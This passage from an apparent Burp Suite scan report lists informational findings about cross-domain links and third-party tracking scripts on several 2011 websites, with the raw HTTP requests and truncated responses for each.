User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=boston+herald&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:unofficial&client=firefox-a
Cookie: PREF=ID=19674e168110c698:U=d120d23c9d525969:TM=1308589662:LM=1310648929:S=ACMkKTxqlwFNhYZK; NID=49=XwWVyBNxwnGNTpllMAJBOS7nfc0GeK5kIXpyO8n0AvIwJSqcFfj4ECTL_npP8jWE6_Jj_qjmPhAEer1IBlpy3dVc5jciEJNCrXoIPfcPa4LHXVxR-GSPooTRnV8-JTc-

Response

HTTP/1.1 302 Found
Location: http://www.bostonherald.com/sports/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Tue, 19 Jul 2011 20:39:52 GMT
Server: gws
Content-Length: 232
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.bostonherald.com/sports/">here</A>
...[SNIP]...

20.84. http://www.googleadservices.com/pagead/conversion/1036609180/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1036609180/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/conversion/1036609180/?random=1311085721821&cv=6&fst=1311085721821&num=1&fmt=1&value=0&label=q3ZTCJzPjgIQnM2l7gM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_his=1&u_tz=-300&u_java=true&u_nplug=6&u_nmime=40&url=http%3A//sharethis.com/privacy HTTP/1.1
Host: www.googleadservices.com
Proxy-Connection: keep-alive
Referer: http://seg.sharethis.com/getSegment.php?purl=http%3A%2F%2Fsharethis.com%2Fprivacy&jsref=&rnd=1311085721255
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
P3P: policyref="http://www.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA PVD OTP OUR OTR IND OTC"
Date: Tue, 19 Jul 2011 14:28:36 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Location: http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1036609180/?random=1311085721821&cv=6&fst=1311085721821&num=1&fmt=1&value=0&label=q3ZTCJzPjgIQnM2l7gM&bg=666666&hl=en&guid=ON&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_his=1&u_tz=-300&u_java=true&u_nplug=6&u_nmime=40&url=http%3A//sharethis.com/privacy&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=true
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: cafe
Content-Length: 381
X-XSS-Protection: 1; mode=block

<html><body bgcolor="#666666" link="#FFFFFF" alink="#FFFFFF" vlink="#FFFFFF" leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><center><font style="font-size:11px" face="arial,sans-serif" color="#FFFFFF">Google Site Stats - <a href="https://services.google.com/sitestats/en_US.html?cid=1036609180" target="_blank">learn more</a>
...[SNIP]...

20.85. http://www.intelex.com/landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.intelex.com
Path:   /landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /landing/Quality_Nonconformance_and_Product_Defect_Tracking_Software-83campaign.aspx?_kk=defect%20tracking%20software&_kt=482c9585-bb4d-4f18-a618-06cac501c541&gclid=CMLoqZDNjaoCFYaD5QodbQ3F0w HTTP/1.1
Host: www.intelex.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 98253


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="cont
...[SNIP]...
<link href='/script/jQuery/fancybox/jquery.fancybox-1.3.0.css' type="text/css" rel="stylesheet" />
<link href="http://www.intelex-exchange.com/admin/openwysiwyg_v1.4.7/styles/campaign-all.css" rel="stylesheet" type="text/css" />
<!--[if lt IE 9]>
...[SNIP]...
<div class="addthis_toolbox addthis_default_style ">
<a href="http://www.addthis.com/bookmark.php?v=250&amp;pubid=ra-4d77db2f6ef335f7" class="addthis_button_compact" title="Share">Share</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=ra-4d77db2f6ef335f7"></script>
...[SNIP]...
<span style="float: right;">
<a title="Customer Community" class="common-bg" href="http://www.intelex-exchange.com/" target="_blank" style="display: inline-block; padding-left: 8px; background-repeat: no-repeat; background-position: left -125px; cursor: pointer;">
<span class="common-bg" style="display: inline-block; color: #FFFFFF; font-weight: bold; text-align: center; height: 17px; padding: 3px 6px 0 0
...[SNIP]...
<td>
<img src="http://www.intelex-exchange.com/images/clients/NrgEnergySm.gif" id="t2_imgQuoteLogo" border="0" style="padding-right: 30px;
margin-top: -2px;" width="94" height="52" />

</td>
...[SNIP]...
<td valign="top" align="center">
<img id="t2_formImage" src="http://www.intelex-exchange.com/images/landing/Logos%20Image28.jpg" style="height:200px;width:274px;" />
<div class="form-rounded curvyRedraw" style="border: 1px solid #AAAAAA; padding: 8px; margin-top: 5px;">
...[SNIP]...
<li><a href="http://www.twitter.com/Intelex" target="_blank" style="background-position: 0px -492px;"
title="Twitter">
</a>
...[SNIP]...
<li><a href="http://www.facebook.com/pages/Toronto-ON/Intelex-Technologies/344068196162" target="_blank" style="background-position: -24px -492px;"
title="Facebook">
</a>
...[SNIP]...
<li><a href="http://www.linkedin.com/companies/659295" target="_blank" style="background-position: -48px -492px;"
title="LinkedIn">
</a>
...[SNIP]...
<li><a href="http://feeds.feedburner.com/intelex/ivSU" target="_blank" style="background-position: -72px -492px;"
title="FeedBurner">
</a>
...[SNIP]...
<li><a href="http://www.youtube.com/user/intelexsoftware" target="_blank" style="background-position: -96px -492px;"
title="Youtube">
</a>
...[SNIP]...
<li><a href="http://itunes.apple.com/us/app/intelex/id356716739?mt=8" target="_blank" style="background-position: -120px -492px;"
title="iPhone App">
</a>
...[SNIP]...
</script>


<script src="http://static.getclicky.com/js" type="text/javascript"></script>
...[SNIP]...
<p style="display: none;"><img alt="Clicky" width="1" height="1" src="http://in.getclicky.com/197095ns.gif" /></p></noscript>
<script type="text/javascript" src="http://lct.salesforce.com/sfga.js"></script>
...[SNIP]...

20.86. http://www.livedrive.com/SignupToLivedrive  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livedrive.com
Path:   /SignupToLivedrive

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /SignupToLivedrive?market=US HTTP/1.1
Host: www.livedrive.com
Proxy-Connection: keep-alive
Referer: http://www.livedrive.com/ForHome/ProSuite
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: tid=; ASP.NET_SessionId=q5aztuic5mnla0v34ds15w55; rotateProductNavPane=7; market=US; __utma=1.1954624592.1311078246.1311078246.1311078246.1; __utmb=1.2.10.1311078246; __utmc=1; __utmz=1.1311078246.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 2.0.50727
Set-Cookie: market=US; expires=Mon, 17-Oct-2011 12:23:33 GMT; path=/
X-Powered-By: ASP.NET
X-Served-By: 101
Date: Tue, 19 Jul 2011 12:23:33 GMT
Connection: close
Content-Length: 19197


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   
   Sign up for Livedrive
...[SNIP]...
</a>
<a class="FooterQuicklinkFacebook" href="http://www.facebook.com/livedriveonline">Facebook</a>
<a class="FooterQuicklinkTwitter" href="http://twitter.com/livedrive_com">Twitter</a>
...[SNIP]...
</script>
<script type="text/javascript" src="https://apis.google.com/js/plusone.js"></script>
...[SNIP]...

20.87. http://www.myspace.com/auth/loginform  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myspace.com
Path:   /auth/loginform

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /auth/loginform?dest=http%3a%2f%2fwww.myspace.com%2fModules%2fPostTo%2fPages%2fdefault.aspx%3fl%3d3%26u%3dhttp%253A%252F%252Fwww.factset.com%252Fproducts%252Fprivateequity%26t%3dPrivate%2bEquity%252C%2bVenture%2bCapital%252C%2bOwnership%252C%2bM%2526A%252C%2bIdea%2bScreening%252C%2bReporting%2b%257C%2bFactSet%2bResearch%2bSystems%26c%3d%253Cp%253EPowered%2bby%2b%253Ca%2bhref%253D%2522http%253A%252F%252Fsharethis.com%2522%253EShareThis%253C%252Fa%253E%253C%252Fp%253E HTTP/1.1
Host: www.myspace.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MSCulture=IP=173.193.214.243&IPCulture=en-US&PreferredCulture=en-US&PreferredCulturePending=&Country=VVM=&ForcedExpiration=634466573070107947&timeZone=0&myStuffDma=&myStuffMarket=&USRLOC=QXJlYUNvZGU9MjE0JkNpdHk9RGFsbGFzJkNvdW50cnlDb2RlPVVTJkNvdW50cnlOYW1lPVVuaXRlZCBTdGF0ZXMmRG1hQ29kZT02MjMmTGF0aXR1ZGU9MzIuNzgyNSZMb25naXR1ZGU9LTk2LjgyMDcmUG9zdGFsQ29kZT03NTIwNyZSZWdpb25OYW1lPVRYJkxvY2F0aW9uSWQ9MA==&UserFirstVisit=1; SessionDDF2=uVsidkC9gs9LxsRzCwBpAqNpUhZIkNkh4AxUscS1Wh/5D61/I2xWndq6Yq1d3SssDjs2CU1kxAVylC6iru8MRA==

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate, proxy-revalidate
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Server: 58f11280d72c42fc4512638736510b7130783a7e53b4cdad
X-AspNet-Version: 4.0.30319
Set-Cookie: MSCOUNTRY=US; domain=.myspace.com; expires=Tue, 26-Jul-2011 14:30:19 GMT; path=/
X-PoweredBy: Just our Will
Date: Tue, 19 Jul 2011 14:30:19 GMT
Content-Length: 11278
X-Vertical: globalsites

<!DOCTYPE html>
<html class="noJS en-US">
<!-- LoginForm -->
<head>
<script type="text/javascript">
   (function (wl, his) {var m = wl.href.match(/([?&]_escaped_fragment_=|#!(?=\/))([^&#]*)/);if (!
...[SNIP]...
<link rel="canonical" href="http://www.myspace.com/auth/loginform" />
<link rel="stylesheet" type="text/css" href="http://x.myspacecdn.com/modules/common/static/css/futuraglobal_-5bd9l4-.css" />
<link rel="stylesheet" type="text/css" href="http://x.myspacecdn.com/modules/common/static/css/futura/icons_neguyziq.css" />
<link rel="stylesheet" type="text/css" href="http://x.myspacecdn.com/modules/login/static/css/loginbundle_mlu5xceb.css" />
</head>
...[SNIP]...
</script><script type="text/javascript" src="http://js.myspacecdn.com/modules/common/static/js/jquery/msglobal_yu2qtsmq.js"></script>
<script type="text/javascript" src="http://cms.myspacecdn.com/cms/js/ad_wrapper0189.js"></script>

   <script type="text/javascript" src="http://js.myspacecdn.com/modules/login/static/js/externalloginbundle_xbaqfwap.js"></script>
...[SNIP]...
<noscript>
                   <img src="http://b.scorecardresearch.com/p?c1=2&c2=4000002&cv=2.0&cj=1" />
               </noscript>
...[SNIP]...

20.88. http://www.nne.aaa.com/en-nne/Pages/Home.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nne.aaa.com
Path:   /en-nne/Pages/Home.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /en-nne/Pages/Home.aspx?zip=05672&referer=www.aaa.com HTTP/1.1
Host: www.nne.aaa.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.aaa.com/scripts/WebObjects.dll/ZipCode.woa/wa/route?rclub=36&rurl=http%3a%2f%2fwww.nne.aaa.com%2fen-nne%2fPages%2fHome.aspx
Cookie: zipcode=05672|AAA|36

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 19:04:25 GMT
Server: Microsoft-IIS/6.0
ACSC: WEB04
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: acezipcode=36|AAA|05672; expires=Thu, 19-Jul-2012 19:04:24 GMT; path=/
Cache-Control: private
Expires: Tue, 19 Jul 2011 19:07:25 GMT
Vary: *, Accept-Encoding, User-Agent
Content-Type: text/html; charset=utf-8
Content-Length: 97400


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns:o="urn:schemas-microsoft-com:office:office" __expr-val-dir="ltr" dir="ltr">
<
...[SNIP]...
<td><a class="Secondary" href="http://www.res99.com/nexres/search/power_search.cgi?src=10023544" target="_blank">Book Flights, Hotels or Cars</a>
...[SNIP]...
<td><a class="Tertiary" href="http://www.nhtsa.gov/Vehicle+Safety/Recalls+&+Defects" target="_blank">Search for Recalls</a>
...[SNIP]...
<p><a href="http://www.adobe.com/go/getflashplayer"><img src="/Style%20Library/slider/featured/images/get_adobe_flash_player.png" alt="Get Adobe Flash player" />
...[SNIP]...
<p>This feature requires <a href="http://get.adobe.com/flashplayer/" target="_blank">Adobe&reg; Flash Player</a>
...[SNIP]...
<p class="getFP"><a href="http://get.adobe.com/flashplayer/" target="_blank"><img src="/Style%20Library/slider/featured/images/get_adobe_flash_player.png" alt="Get Adobe Flash Player" border="0" />
...[SNIP]...
<p>This feature requires <a href="http://get.adobe.com/flashplayer/" target="_blank">Adobe&reg; Flash Player</a>
...[SNIP]...
<p class="getFP"><a href="http://get.adobe.com/flashplayer/" target="_blank"><img src="/Style%20Library/slider/featured/images/get_adobe_flash_player.png" alt="Get Adobe Flash Player" border="0" />
...[SNIP]...
<li><a href="http://capwiz.com/aaanne/home/" target="_blank">Government Affairs</a>
...[SNIP]...
<!-- ConvergeTrack Landing Pixel Code -->
<script type="text/javascript" src="//hits.convergetrack.com/Includes/CT.js"></script>
...[SNIP]...
<noscript><img src="//hits.convergetrack.com/default.aspx?ckid=1033" width="1" height="1" alt=""/></noscript>
...[SNIP]...

20.89. http://www.numarasoftware.com/welcome/service_desk.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.numarasoftware.com
Path:   /welcome/service_desk.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /welcome/service_desk.aspx?src=google&trm=issue_tracking_software HTTP/1.1
Host: www.numarasoftware.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:20:24 GMT
Content-Length: 66115


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html id="html" xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ope
...[SNIP]...
<link rel="stylesheet" type="text/css" href="/assets/css/landing.css" media="all" />
   <script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/1.4.1/jquery.min.js"></script>
...[SNIP]...
<div><img alt="DCSIMG" id="DCSIMG" width="1" height="1" src="http://statse.webtrendslive.com/dcs2jv4o900000oa88gtwa3au_6v2h/njs.gif?dcsuri=/nojavascript&amp;WT.js=No&amp;WT.tv=8.6.2"/></div>
...[SNIP]...

20.90. http://www.seapine.com/ttpro.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seapine.com
Path:   /ttpro.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ttpro.html?utm_source=GoogleAdwords&utm_campaign=BugTrackingAdgroup&utm_medium=Search&utm_content= HTTP/1.1
Host: www.seapine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SourceKey=201107191020391579

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:20:48 GMT
Server: Apache/2.2.3 (CentOS)
Accept-Ranges: bytes
Cache-Control: max-age=7200
Expires: Tue, 19 Jul 2011 16:20:48 GMT
Vary: Accept-Encoding
Content-Length: 28599
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd">
<html>
<head>
   <Title>Issue Tracking Software| TestTrack Pro | Bug Tracking
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script>
...[SNIP]...
<li><a href="http://twitter.com/seapine/" target="_blank">Twitter</a>
...[SNIP]...
<li><a href="http://www.facebook.com/group.php?gid=8301473755" target="_blank">Facebook</a>
...[SNIP]...
<li><a href="http://www.linkedin.com/groups?gid=57703" target="_blank">LinkedIn</a>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://t4.trackalyzer.com/trackalyze.js"></script>
<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.googleadservices.com/pagead/conversion.js">
</script>
...[SNIP]...
<div style="display:inline;">
<img height="1" width="1" style="border-style:none;" alt="" src="http://www.googleadservices.com/pagead/conversion/1072651148/?label=_WuqCNmvlgIQjLe9_wM&amp;guid=ON&amp;script=0"/>
</div>
...[SNIP]...

20.91. http://www.stubhub.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stubhub.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /?ticket_id=303237644&GCID=C12289x970&quantity_selected=2&gtkw=-640518298 HTTP/1.1
Host: www.stubhub.com
Proxy-Connection: keep-alive
Referer: http://bing.fansnap.com/checkout/index/418563179?ctx=c%3Dtix%3Bmt%3Dint%3Btsp%3D0%3Bdt%3D1%3Blpos%3D2&ch=bing&quantity=2&lp=true&poctx=rank%3D36%3BcrawlScore%3Dnull%3Bpop1%3D0.0374%3Bpop2%3D0.0374%3Bpop3%3D0.0374%3B&afm=&uet=-776896836%3A7925%3Apgstickets%7C%7Cbing%7Cmt%3Aint%3Bsz%3A1254%3Bid%3A389669
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26FEA96A851D3BE6-40000130201078BD[CE]; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; mbox=PC#1308447436655-203098.17#1342781785|check#true#1308567445|session#1308567384165-120206#1308569245; s_pers=%20s_nr%3D1308567426309-Repeat%7C1342695426309%3B%20currentCTC%3DRF%253A%2520burp%7C1311159426314%3B%20s_cpm%3D%255B%255B'RF%25253A%252520burp'%252C'1308567426317'%255D%255D%7C1466420226317%3B%20currentCVP%3DRF%253A%2520burp%7C1311159426319%3B%20s_ev41%3D%255B%255B'6%252F20%252F2011%25252010%25253A57%252520AM'%252C'1308567426321'%255D%255D%7C1466420226321%3B; bn_u=6923598397700396013; bn_recs=baynoteOFF

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:39:48 GMT
Server: Apache
Set-Cookie: TLTHID=7AEE7DDAB23610B20167D97254A5AD39; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 4cb3#816c93/
com-stubhub-dye: 4cb3#816c93/
Set-Cookie: STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cstub_sid%7E%5E%7E3186517046%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011; Domain=.stubhub.com; Path=/
Set-Cookie: STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E804700%2C911274%7E%5E%7E06%2F19%2F2011; Domain=.stubhub.com; Expires=Thu, 11-Jul-2041 18:39:48 GMT; Path=/
Set-Cookie: STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E07%2F19%2F2011%7Clname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E07%2F19%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E07%2F19%2F2011%7Cutype%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E07%2F19%2F2011%7Cguid%7E%5E%7EA86F8230C30A02F2E0440021286899D6%7E%5E%7E07%2F19%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E07%2F19%2F2011%7Cotconf%7E%5E%7E8z3dh05a8qE%3D%7E%5E%7E07%2F19%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E07%2F19%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Czcode%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cfname%7E%5E%7E%7E%5E%7E07%2F19%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E07%2F19%2F2011; Domain=.stubhub.com; Path=/
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=utf-8
Content-Length: 37733

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-US" xmlns:sh="http://www.stubhub.com/NS/wp" xmlns="http://www.w3
...[SNIP]...
<link type="text/css" rel="stylesheet" href="${domainProcess.StaticDomainUrlWithRequestProtocol}/resources/mojito/css/pattern/phoenix-RC.css"/> --><link href="http://cache1.stubhubstatic.com/resources/mojito/css/common/stubhub.bundle.201105231737.min.css" rel="stylesheet" type="text/css"/><!-- the "noscript" css will be removed by javascript --><link href="http://cache1.stubhubstatic.com/resources/mojito/css/common/noscript-RC.css" id="noscriptCssLink" rel="stylesheet" type="text/css"/><link href="http://cache1.stubhubstatic.com/resources/mojito/css/feature/ticket-1.0.css" rel="stylesheet" type="text/css"/><link rel="stylesheet" type="text/css" href="http://cache1.stubhubstatic.com/resources/css/stubhub.css">
<meta property="fb:app_id" content="109259765770403">
<link rel="stylesheet" type="text/css" href="http://cache1.stubhubstatic.com/promotions/scratch/lt/www-3.8.css"><script src="http://cache1.stubhubstatic.com/promotions/scratch/test/mbox.js" language="Javascript1.2"></script><link rel="stylesheet" type="text/css" href="http://cache1.stubhubstatic.com/promotions/scratch/CSS/event_help_module.css">
<link rel="stylesheet" type="text/css" href="http://cache1.stubhubstatic.com/promotions/scratch/CSS/genre_page_content_style.css"><script>
...[SNIP]...
</script><script type="text/javascript" src="http://cache1.stubhubstatic.com/promotions/scratch/foresee_v1/foresee-trigger.js"></script>
...[SNIP]...
<![endif]--><script type="text/javascript" src="http://cache1.stubhubstatic.com/promotions/scratch/lt/getCookie-2.1.js"></script><link rel="stylesheet" type="text/css" href="http://cache1.stubhubstatic.com/resources/css/jquery.autocomplete.css"><style>
...[SNIP]...
</noscript><script src="http://s.stubhubstatic.com/resources/mojito/js/lib/TeaLeaf.bundle.201104062011.min.js" type="text/javascript"></script>
...[SNIP]...
</script><script language="javascript" src="http://cache1.stubhubstatic.com/promotions/scratch/lt/omniSearch_02.js"></script>
...[SNIP]...
<a href="/" title="StubHub.com"><img src="http://cache1.stubhubstatic.com/promotions/scratch/lt/sh_logo.gif" border="0"></a>
...[SNIP]...
<li><a href="http://www.facebook.com/Stubhub" target="_blank" title="Become a fan on Facebook"><img src="http://cache1.stubhubstatic.com/promotions/scratch/fb/fb_icon_small.png" width="19" height="18" border="0" style="margin-bottom:-5px; margin-left:-1px;"></a>
...[SNIP]...
<a href="/sports-tickets/" title="sports tickets"><img src="http://cache1.stubhubstatic.com/promotions/scratch/lt/sports_tab.gif" width="69" height="31" border="0"></a>
...[SNIP]...
<a href="/concert-tickets/" title="concert tickets"><img src="http://cache1.stubhubstatic.com/promotions/scratch/lt/concerts_tabbl.gif" width="84" height="31" border="0"></a>
...[SNIP]...
<a href="/theater-tickets/" title="theater tickets"><img src="http://cache1.stubhubstatic.com/promotions/scratch/lt/theater_tab.gif" width="80" height="31" border="0"></a>
...[SNIP]...
<div id="lfthand"><img border="0" align="right" src="http://cache1.stubhubstatic.com/promotions/scratch/lt/hand_left.gif" width="6" height="9"></div>
...[SNIP]...
